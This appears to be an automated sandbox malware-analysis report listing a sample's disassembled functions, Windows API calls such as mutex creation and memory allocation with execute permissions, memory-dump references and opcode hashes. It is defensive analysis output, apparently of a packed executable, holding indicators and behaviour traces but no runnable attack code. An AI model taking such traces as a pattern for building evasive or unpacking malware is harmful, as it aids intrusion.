                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DeleteExchangeInterlocked
                                                                                                                                                                                                                                                                                                • String ID: }I
                                                                                                                                                                                                                                                                                                • API String ID: 1722977832-1906338323
                                                                                                                                                                                                                                                                                                • Opcode ID: 3d9252111c2499e9892cd810a91747644d22c1b39faee1d2a360d963c6ead329
                                                                                                                                                                                                                                                                                                • Instruction ID: 0f44d1f4ef78c4913e9163893a1f1e1819881c729740a469ce0397d160b8c871
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d9252111c2499e9892cd810a91747644d22c1b39faee1d2a360d963c6ead329
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1D05E678000205A9A04521ABC48CE7662CDE9536034A427EFC0DF3160D7299C428AAC
                                                                                                                                                                                                                                                                                                Function 0041A770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18synchronizationCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateMutexW.KERNEL32(00000000,00000000,{E0A52416-D56A-4c3d-BFC7-3F40E77C718E}), ref: 0041A782
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041A793
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • {E0A52416-D56A-4c3d-BFC7-3F40E77C718E}, xrefs: 0041A779
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                • String ID: {E0A52416-D56A-4c3d-BFC7-3F40E77C718E}
                                                                                                                                                                                                                                                                                                • API String ID: 1925916568-1835452401
                                                                                                                                                                                                                                                                                                • Opcode ID: 808971c6715f0aa7f10f9f42aa529678d4de9f456662d07aefcc006699d7f1bb
                                                                                                                                                                                                                                                                                                • Instruction ID: f658fb253292798967ff69ee4118aed0b3c4d26085bed42abcbed525fae359d1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 808971c6715f0aa7f10f9f42aa529678d4de9f456662d07aefcc006699d7f1bb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80D05E383003019BEB609B30CC9979A35A0AB40742FE0887EF01FE46C0DA6CD5C48E09
                                                                                                                                                                                                                                                                                                Function 0041A730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18synchronizationCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateMutexW.KERNEL32(00000000,00000000,{4391F12D-936B-4037-9383-DCB800DF7B65}), ref: 0041A742
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041A753
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • {4391F12D-936B-4037-9383-DCB800DF7B65}, xrefs: 0041A739
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                                                • String ID: {4391F12D-936B-4037-9383-DCB800DF7B65}
                                                                                                                                                                                                                                                                                                • API String ID: 1925916568-3123431990
                                                                                                                                                                                                                                                                                                • Opcode ID: 091c4e7f644ce8bd6197cdb533c163e751dc47d35b49d56a391d01d6980858d1
                                                                                                                                                                                                                                                                                                • Instruction ID: ec8680d88669c7631082afe2fce56944a0d96bb555ced3f370f40cb7f6e8cb2a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 091c4e7f644ce8bd6197cdb533c163e751dc47d35b49d56a391d01d6980858d1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32D05E343003019BEB646B30CC9539A35A0AB40742FE0887EF01FE46D0EA6CD5D49A09

                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                Function 006091B0 Relevance: 1.4, APIs: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 0060926D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2631854093.0000000000609000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                • Opcode ID: de148ecc26438995122263fd84e79d06e7e20828183585f1ddfda33d16eac7f6
                                                                                                                                                                                                                                                                                                • Instruction ID: 902ea12ca2a8b9ed67c7dd2cdb2c025495265744e63fc664879fcf873e36f5e2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de148ecc26438995122263fd84e79d06e7e20828183585f1ddfda33d16eac7f6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41518D71A4424ADFCF45CF98C991AEEBBF2EF09314F284095E465F7282C234AA51DF64
                                                                                                                                                                                                                                                                                                Function 006092CC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 00609314
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00609098: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 006090C1
                                                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 00609366
                                                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(0000002C,?,00000040,0000002C), ref: 006093C0
                                                                                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,?), ref: 006093F3
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2631854093.0000000000609000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Virtual$Alloc$FreeProtect
                                                                                                                                                                                                                                                                                                • String ID: ,
                                                                                                                                                                                                                                                                                                • API String ID: 980677596-3772416878
                                                                                                                                                                                                                                                                                                • Opcode ID: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                                                                • Instruction ID: 738af253e33fc2844edb25ff7b5a8cc7bc7a71a48a5dee11789a4da4251f10ed
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 846e80d9192284de11e110977aaee4205ca63ec1a267e246cbf1a7208dcc7df3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C951F875940609AFCB24DFA9C881ADFBBF9FF08344F10851AF959A7281D370E951CBA4
                                                                                                                                                                                                                                                                                                Function 00600BA2 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3509577899-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 4e897855b1c91e27b5b3822bf0bfb6303626a7a146d8b7883a30a41037c14f16
                                                                                                                                                                                                                                                                                                • Instruction ID: 827714dbcdcd14d99d3e51517cca221d75a07404051d043b83e984966f2d593b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e897855b1c91e27b5b3822bf0bfb6303626a7a146d8b7883a30a41037c14f16
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C516E72640606AFFB299EA4CC85FEB7BAAEF45710F150129FD08962D1EB30ED508660
                                                                                                                                                                                                                                                                                                Function 00601748 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,006012D6,00000001,00000364,00000000,?,000000FF,?,006044E3,?,?,00000000), ref: 00601789
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                • Opcode ID: ee48cdcd52c4b806542326aadda53ed618c04df8f8a6fc717b050504461e197c
                                                                                                                                                                                                                                                                                                • Instruction ID: c9542868706a0b26f0befe5ef7ec36d79098caa58275dbf31f89df352360f859
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee48cdcd52c4b806542326aadda53ed618c04df8f8a6fc717b050504461e197c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1F0E9316C02356BDB6E2A229C55BAB374BDF837B0B198016FC08DE2D0EB70DC0486E4
                                                                                                                                                                                                                                                                                                Function 00603D41 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LCMapStringEx.KERNELBASE(?,00600C92,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00603D75
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: String
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2568140703-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 0945d66e0fc2f7f49b1f81aa2a293dc726ff8842d5d07da23efdc00a5881f432
                                                                                                                                                                                                                                                                                                • Instruction ID: 740aec800bbd3e0fb76d046b126ff8390ddaf2ff82bd4ff66e6689982e7aeed7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0945d66e0fc2f7f49b1f81aa2a293dc726ff8842d5d07da23efdc00a5881f432
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AF09D3644022ABBCF165F91DC19DDE3F2BEF48761F098115FA18652A0C732C971EB90
                                                                                                                                                                                                                                                                                                Function 005FBEFA Relevance: 1.3, APIs: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualFree.KERNELBASE(?,00000000,?), ref: 005FBFCE
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 42e18fdff2272388e3abfa12b665a75fca2b4c47cf89466845bbaf97ee75eff6
                                                                                                                                                                                                                                                                                                • Instruction ID: e70edae92fdbffabaaba60a6755b8701382e4f5cba9e763386f9103fb5502931
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42e18fdff2272388e3abfa12b665a75fca2b4c47cf89466845bbaf97ee75eff6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C311675D00209EFDB10CFA9DC90BAEBFF5BB49700F14902AE655A7250D775A904CFA4
                                                                                                                                                                                                                                                                                                Function 005FBC80 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 005FBCC7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b37e437db9babc49ae3a4f1b2521bdd3b518e7ba0ebdf2ed44f89321ffd0326e
                                                                                                                                                                                                                                                                                                • Instruction ID: 030da3c3227afd8d4ea6e01ef0ce71907682b02e1b5281fd6f05bfe7084934fc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b37e437db9babc49ae3a4f1b2521bdd3b518e7ba0ebdf2ed44f89321ffd0326e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7E06DB5A01617BBA3227B20DD19DBB7A6DFF99742309842AF900E2240DF24DD01C6B1
                                                                                                                                                                                                                                                                                                Function 00609098 Relevance: 1.3, APIs: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 006090C1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000003.2631854093.0000000000609000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000003.2641157936.00000000005D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_3_5d0000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5fa5c9145237fa88e1aa37702aad2718761a025d2b836103e406ca8614d22d44
                                                                                                                                                                                                                                                                                                • Instruction ID: e0a3c4391ce4dc5eb8148b91bd9264e555e35f2c9cedfedefd59b9bde2fcb326
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fa5c9145237fa88e1aa37702aad2718761a025d2b836103e406ca8614d22d44
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A01C471D40249EFEB04CF95C449BAEBBB1AB14326F108059E521AA2D2C3B85A86DF94

                                                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                                                Function 00411150 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,0000024C), ref: 004112A2
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                                • StrFormatByteSizeW.SHLWAPI(00000000,?,?,?,00000000,?,?,?,?,?,00000000,0000024C), ref: 0041141C
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646950404.0000000000496000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000551000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.000000000055A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000565000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2647010953.0000000000599000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FindPrivateProfileString$File$ByteCloseFirstFormatNextSize
                                                                                                                                                                                                                                                                                                • String ID: 3401068$3401069$3401070$DefragTime$DefraggedFileCount$DG$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                                • API String ID: 295610168-2526466113
                                                                                                                                                                                                                                                                                                • Opcode ID: d1cd0ec7a8fdc8ff7367d6e0728dff8a46181e4d412615e5ddc93afe06c8e850
                                                                                                                                                                                                                                                                                                • Instruction ID: 3dc56caefaff00a374a3ee75e2b4c31a72c5442d79c66a3b7d7afc40f3bd3104
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1cd0ec7a8fdc8ff7367d6e0728dff8a46181e4d412615e5ddc93afe06c8e850
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6691A771244340AFD320DF21CC46FAB77E8AF88B14F108A2EF65DA71D1DAB56944CB5A
                                                                                                                                                                                                                                                                                                Function 004112B7 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 147fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                                • StrFormatByteSizeW.SHLWAPI(00000000,?,?,?,00000000,?,?,?,?,?,00000000,0000024C), ref: 0041141C
                                                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000018.00000002.2646785250.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646751332.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000018.00000002.2646874679.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
